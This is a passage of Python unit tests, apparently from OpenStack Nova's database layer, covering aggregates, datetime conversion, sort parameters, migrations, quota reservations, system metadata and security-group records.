expected = db.aggregate_host_get_all(ctxt, result['id'])
self.assertEqual(0, len(expected))
def test_aggregate_host_delete_raise_not_found(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
self.assertRaises(exception.AggregateHostNotFound,
db.aggregate_host_delete,
ctxt, result['id'], _get_fake_aggr_hosts()[0])
class SqlAlchemyDbApiNoDbTestCase(test.NoDBTestCase):
"""No-DB test class for simple test cases that do not require a backend."""
def test_manual_join_columns_immutable_list(self):
# Tests that _manual_join_columns doesn't modify the list passed in.
columns_to_join = ['system_metadata', 'test']
manual_joins, columns_to_join2 = (
sqlalchemy_api._manual_join_columns(columns_to_join))
self.assertEqual(['system_metadata'], manual_joins)
self.assertEqual(['test'], columns_to_join2)
self.assertEqual(['system_metadata', 'test'], columns_to_join)
def test_convert_objects_related_datetimes(self):
t1 = timeutils.utcnow()
t2 = t1 + datetime.timedelta(seconds=10)
t3 = t2 + datetime.timedelta(hours=1)
t2_utc = t2.replace(tzinfo=iso8601.iso8601.Utc())
t3_utc = t3.replace(tzinfo=iso8601.iso8601.Utc())
datetime_keys = ('created_at', 'deleted_at')
test1 = {'created_at': t1, 'deleted_at': t2, 'updated_at': t3}
expected_dict = {'created_at': t1, 'deleted_at': t2, 'updated_at': t3}
sqlalchemy_api.convert_objects_related_datetimes(test1, *datetime_keys)
self.assertEqual(test1, expected_dict)
test2 = {'created_at': t1, 'deleted_at': t2_utc, 'updated_at': t3}
expected_dict = {'created_at': t1, 'deleted_at': t2, 'updated_at': t3}
sqlalchemy_api.convert_objects_related_datetimes(test2, *datetime_keys)
self.assertEqual(test2, expected_dict)
test3 = {'deleted_at': t2_utc, 'updated_at': t3_utc}
expected_dict = {'deleted_at': t2, 'updated_at': t3_utc}
sqlalchemy_api.convert_objects_related_datetimes(test3, *datetime_keys)
self.assertEqual(test3, expected_dict)
def test_convert_objects_related_datetimes_with_strings(self):
t1 = '2015-05-28T17:15:53.000000'
t2 = '2012-04-21T18:25:43-05:00'
t3 = '2012-04-23T18:25:43.511Z'
datetime_keys = ('created_at', 'deleted_at', 'updated_at')
test1 = {'created_at': t1, 'deleted_at': t2, 'updated_at': t3}
expected_dict = {
'created_at': timeutils.parse_strtime(t1).replace(tzinfo=None),
'deleted_at': timeutils.parse_isotime(t2).replace(tzinfo=None),
'updated_at': timeutils.parse_isotime(t3).replace(tzinfo=None)}
sqlalchemy_api.convert_objects_related_datetimes(test1)
self.assertEqual(test1, expected_dict)
sqlalchemy_api.convert_objects_related_datetimes(test1, *datetime_keys)
self.assertEqual(test1, expected_dict)
def test_get_regexp_op_for_database_sqlite(self):
op = sqlalchemy_api._get_regexp_op_for_connection('sqlite:///')
self.assertEqual('REGEXP', op)
def test_get_regexp_op_for_database_mysql(self):
op = sqlalchemy_api._get_regexp_op_for_connection(
'mysql+pymysql://root@localhost')
self.assertEqual('REGEXP', op)
def test_get_regexp_op_for_database_postgresql(self):
op = sqlalchemy_api._get_regexp_op_for_connection(
'postgresql://localhost')
self.assertEqual('~', op)
def test_get_regexp_op_for_database_unknown(self):
op = sqlalchemy_api._get_regexp_op_for_connection('notdb:///')
self.assertEqual('LIKE', op)
@mock.patch.object(sqlalchemy_api, '_create_facade_lazily')
def test_get_engine(self, mock_create_facade):
mock_facade = mock.MagicMock()
mock_create_facade.return_value = mock_facade
sqlalchemy_api.get_engine()
mock_create_facade.assert_called_once_with(sqlalchemy_api._MAIN_FACADE,
CONF.database)
mock_facade.get_engine.assert_called_once_with(use_slave=False)
@mock.patch.object(sqlalchemy_api, '_create_facade_lazily')
def test_get_api_engine(self, mock_create_facade):
mock_facade = mock.MagicMock()
mock_create_facade.return_value = mock_facade
sqlalchemy_api.get_api_engine()
mock_create_facade.assert_called_once_with(sqlalchemy_api._API_FACADE,
CONF.api_database)
mock_facade.get_engine.assert_called_once_with()
@mock.patch.object(sqlalchemy_api, '_create_facade_lazily')
def test_get_session(self, mock_create_facade):
mock_facade = mock.MagicMock()
mock_create_facade.return_value = mock_facade
sqlalchemy_api.get_session()
mock_create_facade.assert_called_once_with(sqlalchemy_api._MAIN_FACADE,
CONF.database)
mock_facade.get_session.assert_called_once_with(use_slave=False)
@mock.patch.object(sqlalchemy_api, '_create_facade_lazily')
def test_get_api_session(self, mock_create_facade):
mock_facade = mock.MagicMock()
mock_create_facade.return_value = mock_facade
sqlalchemy_api.get_api_session()
mock_create_facade.assert_called_once_with(sqlalchemy_api._API_FACADE,
CONF.api_database)
mock_facade.get_session.assert_called_once_with()
class SqlAlchemyDbApiTestCase(DbTestCase):
def test_instance_get_all_by_host(self):
ctxt = context.get_admin_context()
self.create_instance_with_args()
self.create_instance_with_args()
self.create_instance_with_args(host='host2')
result = sqlalchemy_api._instance_get_all_uuids_by_host(ctxt, 'host1')
self.assertEqual(2, len(result))
def test_instance_get_all_uuids_by_host(self):
ctxt = context.get_admin_context()
self.create_instance_with_args()
self.create_instance_with_args()
self.create_instance_with_args(host='host2')
result = sqlalchemy_api._instance_get_all_uuids_by_host(ctxt, 'host1')
self.assertEqual(2, len(result))
self.assertEqual(six.text_type, type(result[0]))
def test_instance_get_active_by_window_joined(self):
now = datetime.datetime(2013, 10, 10, 17, 16, 37, 156701)
start_time = now - datetime.timedelta(minutes=10)
now1 = now + datetime.timedelta(minutes=1)
now2 = now + datetime.timedelta(minutes=2)
now3 = now + datetime.timedelta(minutes=3)
ctxt = context.get_admin_context()
# used for testing columns_to_join
network_info = jsonutils.dumps({'ckey': 'cvalue'})
sample_data = {
'metadata': {'mkey1': 'mval1', 'mkey2': 'mval2'},
'system_metadata': {'smkey1': 'smval1', 'smkey2': 'smval2'},
'info_cache': {'network_info': network_info},
}
self.create_instance_with_args(launched_at=now, **sample_data)
self.create_instance_with_args(launched_at=now1, terminated_at=now2,
**sample_data)
self.create_instance_with_args(launched_at=now2, terminated_at=now3,
**sample_data)
self.create_instance_with_args(launched_at=now3, terminated_at=None,
**sample_data)
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=now)
self.assertEqual(4, len(result))
# verify that all default columns are joined
meta = utils.metadata_to_dict(result[0]['metadata'])
self.assertEqual(sample_data['metadata'], meta)
sys_meta = utils.metadata_to_dict(result[0]['system_metadata'])
self.assertEqual(sample_data['system_metadata'], sys_meta)
self.assertIn('info_cache', result[0])
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=now3, columns_to_join=['info_cache'])
self.assertEqual(2, len(result))
# verify that only info_cache is loaded
meta = utils.metadata_to_dict(result[0]['metadata'])
self.assertEqual({}, meta)
self.assertIn('info_cache', result[0])
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=start_time, end=now)
self.assertEqual(0, len(result))
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=start_time, end=now2,
columns_to_join=['system_metadata'])
self.assertEqual(2, len(result))
# verify that only system_metadata is loaded
meta = utils.metadata_to_dict(result[0]['metadata'])
self.assertEqual({}, meta)
sys_meta = utils.metadata_to_dict(result[0]['system_metadata'])
self.assertEqual(sample_data['system_metadata'], sys_meta)
self.assertNotIn('info_cache', result[0])
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=now2, end=now3,
columns_to_join=['metadata', 'info_cache'])
self.assertEqual(2, len(result))
# verify that only metadata and info_cache are loaded
meta = utils.metadata_to_dict(result[0]['metadata'])
self.assertEqual(sample_data['metadata'], meta)
sys_meta = utils.metadata_to_dict(result[0]['system_metadata'])
self.assertEqual({}, sys_meta)
self.assertIn('info_cache', result[0])
self.assertEqual(network_info, result[0]['info_cache']['network_info'])
@mock.patch('nova.db.sqlalchemy.api.instance_get_all_by_filters_sort')
def test_instance_get_all_by_filters_calls_sort(self,
mock_get_all_filters_sort):
'''Verifies instance_get_all_by_filters calls the sort function.'''
# sort parameters should be wrapped in a list, all other parameters
# should be passed through
ctxt = context.get_admin_context()
sqlalchemy_api.instance_get_all_by_filters(ctxt, {'foo': 'bar'},
'sort_key', 'sort_dir', limit=100, marker='uuid',
columns_to_join='columns', use_slave=True)
mock_get_all_filters_sort.assert_called_once_with(ctxt, {'foo': 'bar'},
limit=100, marker='uuid', columns_to_join='columns',
use_slave=True, sort_keys=['sort_key'], sort_dirs=['sort_dir'])
def test_instance_get_all_by_filters_sort_key_invalid(self):
'''InvalidSortKey raised if an invalid key is given.'''
for keys in [['foo'], ['uuid', 'foo']]:
self.assertRaises(exception.InvalidSortKey,
db.instance_get_all_by_filters_sort,
self.context,
filters={},
sort_keys=keys)
class ProcessSortParamTestCase(test.TestCase):
def test_process_sort_params_defaults(self):
'''Verifies default sort parameters.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params([], [])
self.assertEqual(['created_at', 'id'], sort_keys)
self.assertEqual(['asc', 'asc'], sort_dirs)
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(None, None)
self.assertEqual(['created_at', 'id'], sort_keys)
self.assertEqual(['asc', 'asc'], sort_dirs)
def test_process_sort_params_override_default_keys(self):
'''Verifies that the default keys can be overridden.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_keys=['key1', 'key2', 'key3'])
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['asc', 'asc', 'asc'], sort_dirs)
def test_process_sort_params_override_default_dir(self):
'''Verifies that the default direction can be overridden.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_dir='dir1')
self.assertEqual(['created_at', 'id'], sort_keys)
self.assertEqual(['dir1', 'dir1'], sort_dirs)
def test_process_sort_params_override_default_key_and_dir(self):
'''Verifies that the default key and dir can be overridden.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_keys=['key1', 'key2', 'key3'],
default_dir='dir1')
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['dir1', 'dir1', 'dir1'], sort_dirs)
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_keys=[], default_dir='dir1')
self.assertEqual([], sort_keys)
self.assertEqual([], sort_dirs)
def test_process_sort_params_non_default(self):
'''Verifies that non-default keys are added correctly.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['key1', 'key2'], ['asc', 'desc'])
self.assertEqual(['key1', 'key2', 'created_at', 'id'], sort_keys)
# First sort_dir in list is used when adding the default keys
self.assertEqual(['asc', 'desc', 'asc', 'asc'], sort_dirs)
def test_process_sort_params_default(self):
'''Verifies that default keys are added correctly.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], ['asc', 'desc'])
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['asc', 'desc', 'asc'], sort_dirs)
# Include default key value, rely on default direction
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], [])
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['asc', 'asc', 'asc'], sort_dirs)
def test_process_sort_params_default_dir(self):
'''Verifies that the default dir is applied to all keys.'''
# Direction is set, ignore default dir
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], ['desc'], default_dir='dir')
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['desc', 'desc', 'desc'], sort_dirs)
# But should be used if no direction is set
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], [], default_dir='dir')
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['dir', 'dir', 'dir'], sort_dirs)
def test_process_sort_params_unequal_length(self):
'''Verifies that a sort direction list is applied correctly.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2', 'key3'], ['desc'])
self.assertEqual(['id', 'key2', 'key3', 'created_at'], sort_keys)
self.assertEqual(['desc', 'desc', 'desc', 'desc'], sort_dirs)
        # Keys without a direction default to the first direction in the list
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2', 'key3'], ['desc', 'asc'])
self.assertEqual(['id', 'key2', 'key3', 'created_at'], sort_keys)
self.assertEqual(['desc', 'asc', 'desc', 'desc'], sort_dirs)
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2', 'key3'], ['desc', 'asc', 'asc'])
self.assertEqual(['id', 'key2', 'key3', 'created_at'], sort_keys)
self.assertEqual(['desc', 'asc', 'asc', 'desc'], sort_dirs)
def test_process_sort_params_extra_dirs_lengths(self):
'''InvalidInput raised if more directions are given.'''
self.assertRaises(exception.InvalidInput,
sqlalchemy_api.process_sort_params,
['key1', 'key2'],
['asc', 'desc', 'desc'])
def test_process_sort_params_invalid_sort_dir(self):
'''InvalidInput raised if invalid directions are given.'''
for dirs in [['foo'], ['asc', 'foo'], ['asc', 'desc', 'foo']]:
self.assertRaises(exception.InvalidInput,
sqlalchemy_api.process_sort_params,
['key'],
dirs)
class MigrationTestCase(test.TestCase):
def setUp(self):
super(MigrationTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self._create()
self._create()
self._create(status='reverted')
self._create(status='confirmed')
self._create(status='error')
self._create(source_compute='host2', source_node='b',
dest_compute='host1', dest_node='a')
self._create(source_compute='host2', dest_compute='host3')
self._create(source_compute='host3', dest_compute='host4')
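        # Fixture summary: five host1/a -> host2/b migrations (only the first
        # two are still 'migrating'), plus one host2/b -> host1/a, one
        # host2/a -> host3/b and one host3/a -> host4/b, all 'migrating'.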
def _create(self, status='migrating', source_compute='host1',
source_node='a', dest_compute='host2', dest_node='b',
system_metadata=None, migration_type=None):
values = {'host': source_compute}
instance = db.instance_create(self.ctxt, values)
if system_metadata:
db.instance_system_metadata_update(self.ctxt, instance['uuid'],
system_metadata, False)
values = {'status': status, 'source_compute': source_compute,
'source_node': source_node, 'dest_compute': dest_compute,
'dest_node': dest_node, 'instance_uuid': instance['uuid'],
'migration_type': migration_type}
db.migration_create(self.ctxt, values)
def _assert_in_progress(self, migrations):
for migration in migrations:
self.assertNotEqual('confirmed', migration['status'])
self.assertNotEqual('reverted', migration['status'])
self.assertNotEqual('error', migration['status'])
def test_migration_get_in_progress_joins(self):
self._create(source_compute='foo', system_metadata={'foo': 'bar'})
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'foo', 'a')
system_metadata = migrations[0]['instance']['system_metadata'][0]
self.assertEqual(system_metadata['key'], 'foo')
self.assertEqual(system_metadata['value'], 'bar')
def test_in_progress_host1_nodea(self):
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'host1', 'a')
# 2 as source + 1 as dest
self.assertEqual(3, len(migrations))
self._assert_in_progress(migrations)
def test_in_progress_host1_nodeb(self):
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'host1', 'b')
# some migrations are to/from host1, but none with a node 'b'
self.assertEqual(0, len(migrations))
def test_in_progress_host2_nodeb(self):
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'host2', 'b')
# 2 as dest, 1 as source
self.assertEqual(3, len(migrations))
self._assert_in_progress(migrations)
def test_instance_join(self):
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'host2', 'b')
for migration in migrations:
instance = migration['instance']
self.assertEqual(migration['instance_uuid'], instance['uuid'])
def test_get_migrations_by_filters(self):
filters = {"status": "migrating", "host": "host3",
"migration_type": None, "hidden": False}
migrations = db.migration_get_all_by_filters(self.ctxt, filters)
self.assertEqual(2, len(migrations))
for migration in migrations:
self.assertEqual(filters["status"], migration['status'])
hosts = [migration['source_compute'], migration['dest_compute']]
self.assertIn(filters["host"], hosts)
def test_get_migrations_by_filters_with_type(self):
self._create(status="special", source_compute="host9",
migration_type="evacuation")
self._create(status="special", source_compute="host9",
migration_type="live-migration")
filters = {"status": "special", "host": "host9",
"migration_type": "evacuation", "hidden": False}
migrations = db.migration_get_all_by_filters(self.ctxt, filters)
self.assertEqual(1, len(migrations))
def test_get_migrations_by_filters_source_compute(self):
filters = {'source_compute': 'host2'}
migrations = db.migration_get_all_by_filters(self.ctxt, filters)
self.assertEqual(2, len(migrations))
sources = [x['source_compute'] for x in migrations]
self.assertEqual(['host2', 'host2'], sources)
dests = [x['dest_compute'] for x in migrations]
self.assertEqual(['host1', 'host3'], dests)
def test_migration_get_unconfirmed_by_dest_compute(self):
# Ensure no migrations are returned.
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
'fake_host')
self.assertEqual(0, len(results))
        # Ensure no migrations are returned for the other host either.
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
'fake_host2')
self.assertEqual(0, len(results))
updated_at = datetime.datetime(2000, 1, 1, 12, 0, 0)
values = {"status": "finished", "updated_at": updated_at,
"dest_compute": "fake_host2"}
migration = db.migration_create(self.ctxt, values)
        # Ensure a different host is not returned
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
'fake_host')
self.assertEqual(0, len(results))
# Ensure one migration older than 10 seconds is returned.
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
'fake_host2')
self.assertEqual(1, len(results))
db.migration_update(self.ctxt, migration['id'],
{"status": "CONFIRMED"})
# Ensure the new migration is not returned.
updated_at = timeutils.utcnow()
values = {"status": "finished", "updated_at": updated_at,
"dest_compute": "fake_host2"}
migration = db.migration_create(self.ctxt, values)
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
"fake_host2")
self.assertEqual(0, len(results))
db.migration_update(self.ctxt, migration['id'],
{"status": "CONFIRMED"})
def test_migration_update_not_found(self):
self.assertRaises(exception.MigrationNotFound,
db.migration_update, self.ctxt, 42, {})
class ModelsObjectComparatorMixin(object):
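    """Helpers for comparing DB objects/dicts while ignoring given keys."""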
def _dict_from_object(self, obj, ignored_keys):
if ignored_keys is None:
ignored_keys = []
if isinstance(obj, dict):
obj_items = obj.items()
else:
obj_items = obj.iteritems()
return {k: v for k, v in obj_items
if k not in ignored_keys}
def _assertEqualObjects(self, obj1, obj2, ignored_keys=None):
obj1 = self._dict_from_object(obj1, ignored_keys)
obj2 = self._dict_from_object(obj2, ignored_keys)
self.assertEqual(len(obj1),
len(obj2),
"Keys mismatch: %s" %
str(set(obj1.keys()) ^ set(obj2.keys())))
for key, value in obj1.items():
self.assertEqual(value, obj2[key])
def _assertEqualListsOfObjects(self, objs1, objs2, ignored_keys=None):
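        # Convert each object to a dict without the ignored keys, then sort
        # deterministically so the comparison is order-independent.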
obj_to_dict = lambda o: self._dict_from_object(o, ignored_keys)
sort_key = lambda d: [d[k] for k in sorted(d)]
conv_and_sort = lambda obj: sorted(map(obj_to_dict, obj), key=sort_key)
self.assertEqual(conv_and_sort(objs1), conv_and_sort(objs2))
def _assertEqualOrderedListOfObjects(self, objs1, objs2,
ignored_keys=None):
obj_to_dict = lambda o: self._dict_from_object(o, ignored_keys)
conv = lambda objs: [obj_to_dict(obj) for obj in objs]
self.assertEqual(conv(objs1), conv(objs2))
def _assertEqualListsOfPrimitivesAsSets(self, primitives1, primitives2):
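        # Equal lengths plus mutual membership give an order-insensitive check.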
self.assertEqual(len(primitives1), len(primitives2))
for primitive in primitives1:
self.assertIn(primitive, primitives2)
for primitive in primitives2:
self.assertIn(primitive, primitives1)
class InstanceSystemMetadataTestCase(test.TestCase):
"""Tests for db.api.instance_system_metadata_* methods."""
def setUp(self):
super(InstanceSystemMetadataTestCase, self).setUp()
values = {'host': 'h1', 'project_id': 'p1',
'system_metadata': {'key': 'value'}}
self.ctxt = context.get_admin_context()
self.instance = db.instance_create(self.ctxt, values)
def test_instance_system_metadata_get(self):
metadata = db.instance_system_metadata_get(self.ctxt,
self.instance['uuid'])
self.assertEqual(metadata, {'key': 'value'})
def test_instance_system_metadata_update_new_pair(self):
db.instance_system_metadata_update(
self.ctxt, self.instance['uuid'],
{'new_key': 'new_value'}, False)
metadata = db.instance_system_metadata_get(self.ctxt,
self.instance['uuid'])
self.assertEqual(metadata, {'key': 'value', 'new_key': 'new_value'})
def test_instance_system_metadata_update_existent_pair(self):
db.instance_system_metadata_update(
self.ctxt, self.instance['uuid'],
{'key': 'new_value'}, True)
metadata = db.instance_system_metadata_get(self.ctxt,
self.instance['uuid'])
self.assertEqual(metadata, {'key': 'new_value'})
def test_instance_system_metadata_update_delete_true(self):
db.instance_system_metadata_update(
self.ctxt, self.instance['uuid'],
{'new_key': 'new_value'}, True)
metadata = db.instance_system_metadata_get(self.ctxt,
self.instance['uuid'])
self.assertEqual(metadata, {'new_key': 'new_value'})
@test.testtools.skip("bug 1189462")
def test_instance_system_metadata_update_nonexistent(self):
self.assertRaises(exception.InstanceNotFound,
db.instance_system_metadata_update,
self.ctxt, 'nonexistent-uuid',
{'key': 'value'}, True)
class ReservationTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.reservation_* methods."""
def setUp(self):
super(ReservationTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.reservations = _quota_reserve(self.ctxt, 'project1', 'user1')
usage = db.quota_usage_get(self.ctxt, 'project1', 'resource1', 'user1')
self.values = {'uuid': 'sample-uuid',
'project_id': 'project1',
'user_id': 'user1',
'resource': 'resource1',
'delta': 42,
'expire': timeutils.utcnow() + datetime.timedelta(days=1),
'usage': {'id': usage.id}}
def test_reservation_commit(self):
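        # The reservations made in setUp are still pending, so resource1 and
        # fixed_ips report non-zero 'reserved' counts before the commit.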
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 1, 'in_use': 1},
'fixed_ips': {'reserved': 2, 'in_use': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
_reservation_get(self.ctxt, self.reservations[0])
db.reservation_commit(self.ctxt, self.reservations, 'project1',
'user1')
self.assertRaises(exception.ReservationNotFound,
_reservation_get, self.ctxt, self.reservations[0])
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 0, 'in_use': 2},
'fixed_ips': {'reserved': 0, 'in_use': 4}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
def test_reservation_rollback(self):
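        # Rolling back should clear the pending 'reserved' counts without
        # bumping 'in_use', unlike a commit.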
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 1, 'in_use': 1},
'fixed_ips': {'reserved': 2, 'in_use': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
_reservation_get(self.ctxt, self.reservations[0])
db.reservation_rollback(self.ctxt, self.reservations, 'project1',
'user1')
self.assertRaises(exception.ReservationNotFound,
_reservation_get, self.ctxt, self.reservations[0])
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 0, 'in_use': 1},
'fixed_ips': {'reserved': 0, 'in_use': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
def test_reservation_expire(self):
db.reservation_expire(self.ctxt)
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 0, 'in_use': 1},
'fixed_ips': {'reserved': 0, 'in_use': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
class SecurityGroupRuleTestCase(test.TestCase, ModelsObjectComparatorMixin):
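    """Tests for db.api.security_group_rule_* methods."""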
def setUp(self):
super(SecurityGroupRuleTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_base_values(self):
return {
'name': 'fake_sec_group',
'description': 'fake_sec_group_descr',
'user_id': 'fake',
'project_id': 'fake',
'instances': []
}
def _get_base_rule_values(self):
return {
'protocol': "tcp",
'from_port': 80,
'to_port': 8080,
'cidr': None,
'deleted': 0,
'deleted_at': None,
'grantee_group': None,
'updated_at': None
}
def _create_security_group(self, values):
v = self._get_base_values()
v.update(values)
return db.security_group_create(self.ctxt, v)
def _create_security_group_rule(self, values):
v = self._get_base_rule_values()
v.update(values)
return db.security_group_rule_create(self.ctxt, v)
def test_security_group_rule_create(self):
security_group_rule = self._create_security_group_rule({})
self.assertIsNotNone(security_group_rule['id'])
for key, value in self._get_base_rule_values().items():
self.assertEqual(value, security_group_rule[key])
def _test_security_group_rule_get_by_security_group(self, columns=None):
instance = db.instance_create(self.ctxt,
{'system_metadata': {'foo': 'bar'}})
security_group = self._create_security_group({
'instances': [instance]})
security_group_rule = self._create_security_group_rule(
{'parent_group': security_group, 'grantee_group': security_group})
security_group_rule1 = self._create_security_group_rule(
{'parent_group': security_group, 'grantee_group': security_group})
found_rules = db.security_group_rule_get_by_security_group(
self.ctxt, security_group['id'], columns_to_join=columns)
self.assertEqual(len(found_rules), 2)
rules_ids = [security_group_rule['id'], security_group_rule1['id']]
for rule in found_rules:
if columns is None:
self.assertIn('grantee_group', dict(rule))
self.assertIn('instances',
dict(rule.grantee_group))
self.assertIn(
'system_metadata',
dict(rule.grantee_group.instances[0]))
self.assertIn(rule['id'], rules_ids)
else:
self.assertNotIn('grantee_group', dict(rule))
def test_security_group_rule_get_by_security_group(self):
self._test_security_group_rule_get_by_security_group()
def test_security_group_rule_get_by_security_group_no_joins(self):
self._test_security_group_rule_get_by_security_group(columns=[])
def test_security_group_rule_get_by_security_group_grantee(self):
security_group = self._create_security_group({})
security_group_rule = self._create_security_group_rule(
{'grantee_group': security_group})
rules = db.security_group_rule_get_by_security_group_grantee(self.ctxt,
security_group['id'])
self.assertEqual(len(rules), 1)
self.assertEqual(rules[0]['id'], security_group_rule['id'])
def test_security_group_rule_destroy(self):
self._create_security_group({'name': 'fake1'})
self._create_security_group({'name': 'fake2'})
security_group_rule1 = self._create_security_group_rule({})
security_group_rule2 = self._create_security_group_rule({})
db.security_group_rule_destroy(self.ctxt, security_group_rule1['id'])
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_rule_get,
self.ctxt, security_group_rule1['id'])
self._assertEqualObjects(db.security_group_rule_get(self.ctxt,
security_group_rule2['id']),
security_group_rule2, ['grantee_group'])
def test_security_group_rule_destroy_not_found_exception(self):
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_rule_destroy, self.ctxt, 100500)
def test_security_group_rule_get(self):
security_group_rule1 = (
self._create_security_group_rule({}))
self._create_security_group_rule({})
real_security_group_rule = db.security_group_rule_get(self.ctxt,
security_group_rule1['id'])
self._assertEqualObjects(security_group_rule1,
real_security_group_rule, ['grantee_group'])
def test_security_group_rule_get_not_found_exception(self):
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_rule_get, self.ctxt, 100500)
def test_security_group_rule_count_by_group(self):
sg1 = self._create_security_group({'name': 'fake1'})
sg2 = self._create_security_group({'name': 'fake2'})
rules_by_group = {sg1: [], sg2: []}
for group in rules_by_group:
rules = rules_by_group[group]
for i in range(0, 10):
rules.append(
self._create_security_group_rule({'parent_group_id':
group['id']}))
db.security_group_rule_destroy(self.ctxt,
rules_by_group[sg1][0]['id'])
counted_groups = [db.security_group_rule_count_by_group(self.ctxt,
group['id'])
for group in [sg1, sg2]]
expected = [9, 10]
self.assertEqual(counted_groups, expected)
class SecurityGroupTestCase(test.TestCase, ModelsObjectComparatorMixin):
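    """Tests for db.api.security_group_* methods."""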
def setUp(self):
super(SecurityGroupTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_base_values(self):
return {
'name': 'fake_sec_group',
'description': 'fake_sec_group_descr',
'user_id': 'fake',
'project_id': 'fake',
'instances': []
}
def _create_security_group(self, values):
v = self._get_base_values()
v.update(values)
return db.security_group_create(self.ctxt, v)
def test_security_group_create(self):
security_group = self._create_security_group({})
self.assertIsNotNone(security_group['id'])
for key, value in self._get_base_values().items():
self.assertEqual(value, security_group[key])
def test_security_group_destroy(self):
security_group1 = self._create_security_group({})
security_group2 = \
self._create_security_group({'name': 'fake_sec_group2'})
db.security_group_destroy(self.ctxt, security_group1['id'])
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_get,
self.ctxt, security_group1['id'])
self._assertEqualObjects(db.security_group_get(
self.ctxt, security_group2['id'],
columns_to_join=['instances']), security_group2)
def test_security_group_get(self):
security_group1 = self._create_security_group({})
self._create_security_group({'name': 'fake_sec_group2'})
real_security_group = db.security_group_get(self.ctxt,
security_group1['id'],
columns_to_join=['instances'])
self._assertEqualObjects(security_group1,
real_security_group)
def test_security_group_get_with_instance_columns(self):
instance = db.instance_create(self.ctxt,
{'system_metadata': {'foo': 'bar'}})
secgroup = self._create_security_group({'instances': [instance]})
secgroup = db.security_group_get(
self.ctxt, secgroup['id'],
columns_to_join=['instances.system_metadata'])
inst = secgroup.instances[0]
self.assertIn('system_metadata', dict(inst).keys())
def test_security_group_get_no_instances(self):
instance = db.instance_create(self.ctxt, {})
sid = self._create_security_group({'instances': [instance]})['id']
security_group = db.security_group_get(self.ctxt, sid,
columns_to_join=['instances'])
self.assertIn('instances', security_group.__dict__)
security_group = db.security_group_get(self.ctxt, sid)
self.assertNotIn('instances', security_group.__dict__)
def test_security_group_get_not_found_exception(self):
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_get, self.ctxt, 100500)
def test_security_group_get_by_name(self):
security_group1 = self._create_security_group({'name': 'fake1'})
security_group2 = self._create_security_group({'name': 'fake2'})
real_security_group1 = db.security_group_get_by_name(
self.ctxt,
security_group1['project_id'],
security_group1['name'],
columns_to_join=None)
real_security_group2 = db.security_group_get_by_name(
self.ctxt,
security_group2['project_id'],
security_group2['name'],
columns_to_join=None)
self._assertEqualObjects(security_group1, real_security_group1)
self._assertEqualObjects(security_group2, real_security_group2)
